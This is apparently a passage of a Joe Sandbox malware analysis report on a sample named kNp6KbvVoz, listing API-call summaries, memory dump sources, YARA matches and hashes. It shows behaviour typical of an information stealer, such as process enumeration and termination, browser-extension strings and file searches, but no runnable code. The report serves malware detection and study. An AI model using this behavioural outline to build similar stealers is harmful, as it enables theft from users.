                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                      • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                      • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                      • Opcode Fuzzy Hash: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                      • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                      APIs
                                      • memset.MSVCRT ref: 0041967B
                                        • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                        • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                        • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                      • CloseHandle.KERNEL32(00000000), ref: 00419766
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 396451647-0
                                      • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                      • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                      • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                      • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                      APIs
                                      • memset.MSVCRT ref: 048D98E2
                                        • Part of subcall function 048D9147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,048D9915,00000000), ref: 048D9152
                                        • Part of subcall function 048D9147: RtlAllocateHeap.NTDLL(00000000), ref: 048D9159
                                        • Part of subcall function 048D9147: wsprintfW.USER32 ref: 048D916F
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 048D99A2
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 048D99C0
                                      • CloseHandle.KERNEL32(00000000), ref: 048D99CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                      • Instruction ID: 55471c04a1f80f9f745e6cf309963db60d4c43b039f74dd488bd83472d1d4689
                                      • Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                      • Instruction Fuzzy Hash: EC311EB1E02248EBDB14DFE4CD48BEDB779BB44304F504959E506AB188EBB46A44CB52
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 048D8AC1
                                      • Process32First.KERNEL32(?,00000128), ref: 048D8AD5
                                      • Process32Next.KERNEL32(?,00000128), ref: 048D8AEA
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • CloseHandle.KERNEL32(?), ref: 048D8B58
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                      • Instruction ID: 8465528f184aeae8c15724f5f3e1509c95576b755e22df8027b565c0737c208c
                                      • Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                      • Instruction Fuzzy Hash: 5C3141B1942258ABDB68EF54DC40FEEB778EF44705F104A99A50AE2190EBB06F44CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                      • wsprintfA.USER32 ref: 004189E0
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 2716131235-2206825331
                                      • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                      • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                      • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                      • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0493F27A
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0493F293
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: a3073f86f033dc0762910c96d416c78aba213c6e155ca21a57aa8dc8bf2ee5ef
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 7901FC36B08721DEF7245B74ACC4E5A2A59EB827BAB30433AF625810E4FF5168405584
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID:
                                      • API String ID: 3407564107-0
                                      • Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                      • Instruction ID: 582df209524071b0a1a216d9e03802c5f022abb4f9cbcc0d2f29f4be46f6f1f0
                                      • Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                      • Instruction Fuzzy Hash: 8C113D74D01109EFDB04DFE4D948AEDBB74BF44309F108569E916A7250EB706B44CB55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                      • wsprintfA.USER32 ref: 00417B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 1243822799-0
                                      • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                      • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                      • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                      • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 048D7DA7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D7DAE
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 048D7DBB
                                      • wsprintfA.USER32 ref: 048D7DEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                      • Instruction ID: 5bad1d02d22aa6d1aaad1776c8cb42f0c42a8c3affd7fec207b92529f2d6a107
                                      • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                      • Instruction Fuzzy Hash: A6112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10421AF605A2280E2395940C7B5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 048D7E5A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D7E61
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 048D7E74
                                      • wsprintfA.USER32 ref: 048D7EAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                      • Instruction ID: 18616a4ca0d8374c3e9ce5bfd8305e6b04bee16cadbc4ba5ded6406fab76f9be
                                      • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                      • Instruction Fuzzy Hash: 91118EB1E06228EBEB208B54DC45FA9BB78FB05711F1007A6F619E32C0D7746A408B55
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      • Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                      • Instruction ID: 35825619a44e8d26ad7604844eb2b6b8468c2c23b13a5aaa1c896028a0450eb5
                                      • Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                      • Instruction Fuzzy Hash: AB11FAB0F012099FDB14CFE9D948BEEB7B9EF44305F108529E915BA250E774A500CF56
                                      APIs
                                      • CreateFileA.KERNEL32(048D3FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,048D3FA5,?), ref: 048D96F3
                                      • GetFileSizeEx.KERNEL32(000000FF,048D3FA5), ref: 048D9710
                                      • CloseHandle.KERNEL32(000000FF), ref: 048D971E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                      • Instruction ID: e88cab955f6d8ef20d8a9c2997a3a333ad05a9e37bb4029c94c1af18998e586e
                                      • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                      • Instruction Fuzzy Hash: 10F03779E15208BBDB14DFB0EC49F9E77BAAB48704F10C695FA25E72C0E630A6018B40
                                      APIs
                                      • LoadLibraryA.KERNEL32(004212DC), ref: 048CA2FF
                                      • GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 048CA325
                                      • GetProcAddress.KERNEL32(006D70A8,00421310), ref: 048CA33C
                                      • FreeLibrary.KERNEL32(006D70A8), ref: 048CA360
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryProc$FreeLoad
                                      • String ID:
                                      • API String ID: 2256533930-0
                                      • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                      • Instruction ID: 5c903e34a7090892d2ad61207ee75e3c183da2928c3bd6161a3eb0534f093210
                                      • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                      • Instruction Fuzzy Hash: 4FF0F9B4A0A228EFD7049B69ED58B5537A6F308701F506A2AF505C72E0E3B4A484CB66
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D6FD1
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 048D6FEF
                                      • CloseHandle.KERNEL32(00000000), ref: 048D7000
                                      • Sleep.KERNEL32(00001770), ref: 048D700B
                                      • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D7021
                                      • ExitProcess.KERNEL32 ref: 048D7029
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                      • Instruction ID: fca186621d3eb18b1bd5f03296a0a45bf738d7bbcc5501135010258363603b68
                                      • Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                      • Instruction Fuzzy Hash: 97F05E30E4A229EAE720BBA4DC04B7DB775AB04709F140F15B912E51D0EBB07900DA63
                                      APIs
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0493EE8E
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0493EF42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 3480331319-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: 276f6a6ec2d0b4def521059e0a1fa16a53a83a4cb579a160ead7a987a41dc6d2
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: F541C434A00218DFDF20EF68C884A9EBBB6FF86315F148165F919AB391D771B911CB90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: 1b41783f10898cfe42e5cd9ca6a3d73c93bf2af7f8815e8df54fa35e19088435
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 40413871D00109EFDF15CF98CD81AAEBBB9FF49309F148169E909A7224E335A950DB51
                                      APIs
                                        • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                      • lstrcatA.KERNEL32(?,02EB5A38), ref: 004152F8
                                        • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                        • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                      • String ID: 9dA
                                      • API String ID: 2699682494-3568425128
                                      • Opcode ID: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                      • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                      • Opcode Fuzzy Hash: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                      • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048CA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4
                                      • lstrlen.KERNEL32(00000000), ref: 048CBED6
                                        • Part of subcall function 048D9227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 048D9249
                                      • StrStrA.SHLWAPI(00000000,0042143C), ref: 048CBF04
                                      • lstrlen.KERNEL32(00000000), ref: 048CBFDC
                                      • lstrlen.KERNEL32(00000000), ref: 048CBFF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID:
                                      • API String ID: 1440504306-0
                                      • Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                      • Instruction ID: e5af900dbbfcdf285809b223aeb4e56fae8274c38d85131997db7c34486a0dec
                                      • Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                      • Instruction Fuzzy Hash: 88B121719012189BDF1CFBA4DC95EEE7339AF14209F504A6DE507E6090EFB47A48CB62
                                      APIs
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                      • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                      • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFileNextlstrcat
                                      • String ID: q?A
                                      • API String ID: 3840410801-4084695119
